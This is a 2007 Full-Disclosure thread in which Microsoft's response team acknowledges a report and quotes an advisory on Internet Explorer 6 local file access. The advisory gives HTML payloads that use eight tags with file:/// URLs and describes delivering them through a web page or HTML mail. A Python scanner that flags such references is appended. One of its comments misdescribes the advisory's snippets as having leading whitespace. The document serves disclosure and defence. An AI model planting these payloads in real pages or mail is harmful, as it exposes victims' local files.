Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability [7244ks]
- To: "'Rajesh Sethumadhavan'" <rajesh.sethumadhavan@xxxxxxxxx>, "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] Microsoft Internet Explorer Local File Accesses Vulnerability [7244ks]
- From: Microsoft Security Response Center <secure@xxxxxxxxxxxxx>
- Date: Mon, 19 Feb 2007 17:53:19 -0800
Hello Rajesh,
Thanks very much for your report. I have opened case 7244 and the case manager,
Kieron, will be in touch when there is more information. In the meantime, we
ask that you respect responsible disclosure guidelines and not report this publicly
until users have an opportunity to protect themselves. You can review our
bulletin acknowledgment policy at
http://www.microsoft.com/technet/security/bulletin/policy.mspx and our general
policies and practices at
http://www.microsoft.com/technet/security/bulletin/info/msrpracs.mspx. If at
any time you have questions or more information, please respond to this message.
Thank you,
Christine
-----Original Message-----
From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx
[mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of Rajesh
Sethumadhavan
Sent: Monday, February 19, 2007 2:14 PM
To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Microsoft Internet Explorer Local File Accesses
Vulnerability
Microsoft Internet Explorer Local File Accesses Vulnerability
#####################################################################
XDisclose Advisory : XD100099
Vulnerability Discovered : February 10th 07
Advisory Released : February 20th 07
Credit : Rajesh Sethumadhavan
Class : Local File Accesses
Severity : Critical
Solution Status : Unpatched
Vendor : Microsoft Corporation
Affected applications : Microsoft Internet Explorer
Affected version : Microsoft Internet Explorer 6 confirmed
(Other versions may be also affected)
Affected Platform : Windows XP Professional SP0,SP1,SP2
Windows Home Edition SP0,SP1,SP2
Windows 2003
#####################################################################
Overview:
Microsoft Internet Explorer is the default browser bundled with all versions of
the Microsoft Windows operating system.
Description:
A vulnerability has been identified in Microsoft Internet Explorer (default
installation) on Windows XP Service Pack 2 which could be exploited by
malicious users to obtain victims' local files. This flaw is due to an error in
the way Microsoft Internet Explorer handles different HTML tags, which could be
exploited by a malicious remote user to obtain sensitive local files from the
victim's computer.
Vulnerability Insight :
Microsoft Windows Explorer does not handle various HTML tags like "img",
"script", "embed", "object", "param", "style", "bgsound", "body" and "input"
correctly (other tags may also be vulnerable). By using the file protocol along
with the above tags it is possible to access victims' local files.
a) Embed Tag Local file Accesses:
---------------------------------------------------------------------
<EMBED SRC="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440></EMBED>
---------------------------------------------------------------------
b) Object & Param Tag Local File Accesses:
---------------------------------------------------------------------
<object type="audio/x-mid" data="file:///C:/test.mid"
        width="200"
        height="20">
  <param name="src" value="file:///C:/test.mid">
  <param name="autoStart" value="true">
  <param name="autoStart" value="0">
</object>
---------------------------------------------------------------------
c) Body Tag Local File Accesses:
---------------------------------------------------------------------
<body background="file:///C:/test.gif" onload="alert('loading body bgrd
success')" onerror="alert('loading body bgrd error')">
---------------------------------------------------------------------
d) Style Tag Local File Accesses:
---------------------------------------------------------------------
<STYLE type="text/css">BODY{background:url("file:///C:/test.gif")}</STYLE>
---------------------------------------------------------------------
e) Bgsound Tag Local File Accesses:
---------------------------------------------------------------------
<bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart="true"/>
---------------------------------------------------------------------
f) Input Tag Local File Accesses:
---------------------------------------------------------------------
<form>
  <input type="image" src="file:///C:/test.gif"
         onload="alert('loading input success')"
         onerror="alert('loading input error')">
</form>
---------------------------------------------------------------------
g) Image Tag Local File Accesses:
---------------------------------------------------------------------
<img src="file:///C:/test.jpg" onload="alert('loading image success')"
onerror="alert('loading image error')">
---------------------------------------------------------------------
h) Script Tag Local File Accesses:
---------------------------------------------------------------------
<script src="file:///C:/test.js"></script>
---------------------------------------------------------------------
Exploitation method:
- Create a web page or an HTML mail with the vulnerable code
- When the victim opens the mail or visits the vulnerable site it is
possible to access his local files.
Demonstration:
Note: The demonstration will try to access a few default images and wave files
- Visit the POC
- If a vulnerable Internet Explorer is used, it will show your local
sample images and give a proper alert.
Solution:
No solution
Screenshot:
http://www.xdisclose.com/images/xdiscloselocalie.jpg
Proof Of Concept:
http://www.xdisclose.com/poc/xdiscloselocalie.html
Impact:
A remote user can get access to victims' local system files.
Scope of impact is limited to system level.
Original Advisory:
http://www.xdisclose.com/XD100099.txt
Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability
Disclaimer:
This entire document is strictly for educational, testing and demonstration
purposes only. Modification, use and/or publishing of this information is entirely
at your own risk. The exploit code is to be used in your testing environment
only. I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this advisory.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
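The advisory's common thread is untrusted markup pointing the browser at file: URLs through several tags and through CSS url(). The following is an added example, not code from the advisory or from Microsoft: a content-filter check, of the kind a mail gateway or HTML sanitizer would run before rendering, that flags file: references on the tags the advisory names, tolerating the leading whitespace and mixed case seen in its snippets. The tag-to-attribute map and the sample markup are constructed for this example.

```python
# Added example, not code from the advisory or from Microsoft: flag HTML that
# pulls local files via the file: scheme through the tags the advisory names
# (img, script, embed, object, param, style, bgsound, body, input).
import re
from html.parser import HTMLParser

# Attributes IE fetches as URLs on the tags named in the advisory (constructed map).
URL_ATTRS = {"img": {"src"}, "script": {"src"}, "embed": {"src"},
             "object": {"data"}, "param": {"value"}, "bgsound": {"src"},
             "body": {"background"}, "input": {"src"}}
# Leading whitespace is tolerated: the advisory's snippets use " file:///...".
FILE_SCHEME_RE = re.compile(r"^\s*file:", re.I)
# CSS url(...) with optional quotes/padding, for <style> bodies and style="".
CSS_URL_RE = re.compile(r"url\(\s*['\"]?\s*([^'\")]+?)\s*['\"]?\s*\)", re.I)

def is_local_file_ref(url):
    """True when the URL uses the file: scheme, ignoring surrounding whitespace."""
    return bool(FILE_SCHEME_RE.match(url or ""))

class LocalFileRefScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._in_style = [], False   # (tag, attribute, url)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            value = value or ""                       # bare attributes have no value
            if name == "style":                       # inline CSS on any element
                self._check_css(tag, name, value)
            elif name in URL_ATTRS.get(tag, ()) and is_local_file_ref(value):
                self.findings.append((tag, name, value.strip()))
        self._in_style = tag == "style"               # <style> body arrives as data

    def handle_endtag(self, tag):
        self._in_style = self._in_style and tag != "style"

    def handle_data(self, data):
        if self._in_style:
            self._check_css("style", "url()", data)

    def _check_css(self, tag, attr, css):
        for url in CSS_URL_RE.findall(css):
            if is_local_file_ref(url):
                self.findings.append((tag, attr, url.strip()))

def find_local_file_refs(html):
    """Return every file: reference in the HTML as (tag, attribute, url)."""
    scanner = LocalFileRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Anything the scanner returns is a reason to refuse or rewrite the document; an http(s) image reference, for instance, is left alone.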